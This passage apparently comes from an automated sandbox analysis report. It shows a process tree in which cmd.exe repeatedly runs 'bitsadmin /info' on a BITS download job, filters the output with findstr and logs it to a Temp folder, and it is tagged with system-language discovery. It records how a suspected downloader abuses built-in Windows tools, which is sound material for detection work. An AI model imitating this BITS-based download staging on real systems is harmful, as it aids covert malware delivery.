C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:816
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:888
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1620
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:4016
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3916
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵
- System Location Discovery: System Language Discovery
PID:2820 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2468
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2176
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1552
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:904
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2776
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1928
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3332
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3064
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:820
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3980
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2844
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1772
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵
- System Location Discovery: System Language Discovery
PID:2424
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3156
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2412
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2788
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3432
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵
- System Location Discovery: System Language Discovery
PID:1896
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2680
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:4000
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3436
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2220
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2304
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3744
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵
- System Location Discovery: System Language Discovery
PID:2028
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1672
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3140
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:340
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3732
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2836
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2652
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2408
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2968
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵
- System Location Discovery: System Language Discovery
PID:3688
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3456
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2044
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1696
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:4032
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:816
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3808
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:884
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2888
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3748
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵
- System Location Discovery: System Language Discovery
PID:1620 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2116
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2040
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2976
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1140
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2820
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3648
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1980
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3888
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:904
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3900
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1844
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2992
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:940
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1756
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:760
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:656
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3884
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:820
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2844
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2760
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1648
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3156
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2576
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:112
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵
- System Location Discovery: System Language Discovery
PID:2660
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵
- System Location Discovery: System Language Discovery
PID:3816
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1896
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2792
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1260
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2100
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2220
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3540
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2580
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2028
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3140
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3812
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:4036
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3732
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2652
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:4052
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3708
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵
- System Location Discovery: System Language Discovery
PID:2968
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3456
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3764
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2876
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵
- System Location Discovery: System Language Discovery
PID:1696
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:816
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1396
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3976
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2936
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2888
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1688
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1628
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1520
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:888
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1552
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:744
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2820
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2468
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3964
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3888
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1928
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2508
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵
- System Location Discovery: System Language Discovery
PID:3336 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2172
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2992
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵
- System Location Discovery: System Language Discovery
PID:3008
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵
- System Location Discovery: System Language Discovery
PID:1724 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:4004
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:656
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3804
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3180
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3112
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2680
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3168
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1028
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2580
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3140
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2812
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2836
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:4036
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2652
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:4024
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1076
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵
- System Location Discovery: System Language Discovery
PID:480
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3796
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2196
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵
- System Location Discovery: System Language Discovery
PID:2264 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3960
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3808
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:884
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵
- System Location Discovery: System Language Discovery
PID:2864 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2040
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2976
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3660
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3836
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1980
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3692
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:744
-
-
-
